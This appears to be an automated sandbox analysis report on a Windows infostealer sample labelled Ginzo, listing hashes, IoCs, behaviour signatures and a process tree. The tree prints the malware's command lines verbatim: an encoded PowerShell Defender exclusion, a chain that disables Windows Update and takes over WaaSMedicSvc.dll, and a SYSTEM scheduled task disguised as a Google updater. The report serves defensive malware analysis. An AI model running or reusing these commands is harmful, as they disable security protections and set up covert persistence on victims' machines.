Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
04-05-2022 12:32
Static task
static1
General
-
Target
59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe
-
Size
396KB
-
MD5
cdf4d67f3c2a779b0e36b0e566d96d5b
-
SHA1
a9b6050f5f4d5724de611cd5be4064e23751003a
-
SHA256
59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572
-
SHA512
774431280b04341b74229afb168653fa922c2240ca79e1830d007de729451d8a2c17695afbd8181a44d2b677edb9fdf9ea543d721506a596817331bce9ca4c0a
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
2.exeGinzo.exe881687.exeupdater.exepid process 1732 2.exe 3480 Ginzo.exe 220 881687.exe 568 updater.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 608 takeown.exe 1344 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exeGinzo.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation Ginzo.exe -
Loads dropped DLL 7 IoCs
Processes:
Ginzo.exepid process 3480 Ginzo.exe 3480 Ginzo.exe 3480 Ginzo.exe 3480 Ginzo.exe 3480 Ginzo.exe 3480 Ginzo.exe 3480 Ginzo.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 608 takeown.exe 1344 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 freegeoip.app 17 freegeoip.app -
Suspicious use of SetThreadContext 2 IoCs
Processes:
conhost.exedescription pid process target process PID 4824 set thread context of 3636 4824 conhost.exe conhost.exe PID 4824 set thread context of 3948 4824 conhost.exe explorer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Ginzo.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Ginzo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Ginzo.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 4304 powershell.exe 4304 powershell.exe 1404 conhost.exe 2804 powershell.exe 2804 powershell.exe 4824 conhost.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
Processes:
Ginzo.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 3480 Ginzo.exe Token: SeDebugPrivilege 4304 powershell.exe Token: SeDebugPrivilege 1404 conhost.exe Token: SeShutdownPrivilege 556 powercfg.exe Token: SeCreatePagefilePrivilege 556 powercfg.exe Token: SeShutdownPrivilege 1392 powercfg.exe Token: SeCreatePagefilePrivilege 1392 powercfg.exe Token: SeShutdownPrivilege 1760 powercfg.exe Token: SeCreatePagefilePrivilege 1760 powercfg.exe Token: SeShutdownPrivilege 3292 powercfg.exe Token: SeCreatePagefilePrivilege 3292 powercfg.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 4824 conhost.exe Token: SeShutdownPrivilege 4000 powercfg.exe Token: SeCreatePagefilePrivilege 4000 powercfg.exe Token: SeShutdownPrivilege 2396 powercfg.exe Token: SeCreatePagefilePrivilege 2396 powercfg.exe Token: SeShutdownPrivilege 2176 powercfg.exe Token: SeCreatePagefilePrivilege 2176 powercfg.exe Token: SeShutdownPrivilege 1360 powercfg.exe Token: SeCreatePagefilePrivilege 1360 powercfg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exeGinzo.exe881687.execonhost.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2480 wrote to memory of 1732 2480 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe 2.exe PID 2480 wrote to memory of 1732 2480 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe 2.exe PID 2480 wrote to memory of 1732 2480 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe 2.exe PID 2480 wrote to memory of 3480 2480 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe Ginzo.exe PID 2480 wrote to memory of 3480 2480 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe Ginzo.exe PID 2480 wrote to memory of 3480 2480 59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe Ginzo.exe PID 3480 wrote to memory of 220 3480 Ginzo.exe 881687.exe PID 3480 wrote to memory of 220 3480 Ginzo.exe 881687.exe PID 220 wrote to memory of 1404 220 881687.exe conhost.exe PID 220 wrote to memory of 1404 220 881687.exe conhost.exe PID 220 wrote to memory of 1404 220 881687.exe conhost.exe PID 1404 wrote to memory of 828 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 828 1404 conhost.exe cmd.exe PID 828 wrote to memory of 4304 828 cmd.exe powershell.exe PID 828 wrote to memory of 4304 828 cmd.exe powershell.exe PID 1404 wrote to memory of 2388 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 2388 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 3956 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 3956 1404 conhost.exe cmd.exe PID 2388 wrote to memory of 2044 2388 cmd.exe sc.exe PID 2388 wrote to memory of 2044 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1048 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1048 2388 cmd.exe sc.exe PID 3956 wrote to memory of 556 3956 cmd.exe powercfg.exe PID 3956 wrote to memory of 556 3956 cmd.exe powercfg.exe PID 3956 wrote to memory of 1392 3956 cmd.exe powercfg.exe PID 3956 wrote to memory of 1392 3956 cmd.exe powercfg.exe PID 2388 wrote to memory of 60 2388 cmd.exe sc.exe PID 2388 wrote to memory of 60 2388 cmd.exe sc.exe PID 1404 wrote to memory of 4080 1404 conhost.exe cmd.exe PID 1404 wrote to memory of 4080 1404 conhost.exe cmd.exe PID 3956 wrote to memory of 1760 3956 cmd.exe powercfg.exe PID 3956 wrote to memory of 1760 3956 cmd.exe powercfg.exe PID 2388 wrote to memory of 4948 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4948 2388 cmd.exe sc.exe PID 3956 wrote to memory of 3292 3956 cmd.exe powercfg.exe PID 3956 wrote to memory of 3292 3956 cmd.exe powercfg.exe PID 4080 wrote to memory of 392 4080 cmd.exe schtasks.exe PID 4080 wrote to memory of 392 4080 cmd.exe schtasks.exe PID 2388 wrote to memory of 1448 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1448 2388 cmd.exe sc.exe PID 2388 wrote to memory of 3500 2388 cmd.exe sc.exe PID 2388 wrote to memory of 3500 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1572 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1572 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4004 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4004 2388 cmd.exe sc.exe PID 2388 wrote to memory of 3032 2388 cmd.exe sc.exe PID 2388 wrote to memory of 3032 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4132 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4132 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1932 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1932 2388 cmd.exe sc.exe PID 2388 wrote to memory of 2000 2388 cmd.exe sc.exe PID 2388 wrote to memory of 2000 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4360 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4360 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4344 2388 cmd.exe sc.exe PID 2388 wrote to memory of 4344 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1092 2388 cmd.exe sc.exe PID 2388 wrote to memory of 1092 2388 cmd.exe sc.exe PID 2388 wrote to memory of 608 2388 cmd.exe takeown.exe PID 2388 wrote to memory of 608 2388 cmd.exe takeown.exe PID 2388 wrote to memory of 1344 2388 cmd.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe"C:\Users\Admin\AppData\Local\Temp\59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\881687.exe"C:\Users\Admin\AppData\Local\881687.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\881687.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
-
C:\Windows\system32\sc.exesc stop bits6⤵
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""6⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled6⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""6⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled6⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""6⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled6⤵
-
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""6⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled6⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""6⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f6⤵
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f6⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f6⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE6⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\Chrome\updater.exeC:\Users\Admin\AppData\Roaming\Chrome\updater.exe6⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE8⤵
-
C:\Windows\system32\sc.exesc stop wuauserv9⤵
-
C:\Windows\system32\sc.exesc stop bits9⤵
-
C:\Windows\system32\sc.exesc stop dosvc9⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc9⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc9⤵
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled9⤵
-
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""9⤵
-
C:\Windows\system32\sc.exesc config bits start= disabled9⤵
-
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""9⤵
-
C:\Windows\system32\sc.exesc config dosvc start= disabled9⤵
-
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""9⤵
-
C:\Windows\system32\sc.exesc config UsoSvc start= disabled9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 09⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 09⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 09⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 09⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==8⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\881687.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\881687.exeFilesize
4.2MB
MD58268ff95b3aaea6d6de8f02a73c323d2
SHA1ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA5129603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
443B
MD58add56521ef894ef0c66ecd3e989d718
SHA12058aa5185fd5dcce7263bef8fe35bf5e12dbc7f
SHA25601bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724
SHA512af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
C:\Users\Admin\AppData\Local\Temp\2.exeFilesize
365KB
MD548f7091e08fcc58eeb7bb58f2850f1d3
SHA1b73bbab490536322aab131e8aaa1e391bcce1ffd
SHA256f079eafd4b372fda5000c834c2c88e0d4146a046c02a01be6874f3c9ca0cc70b
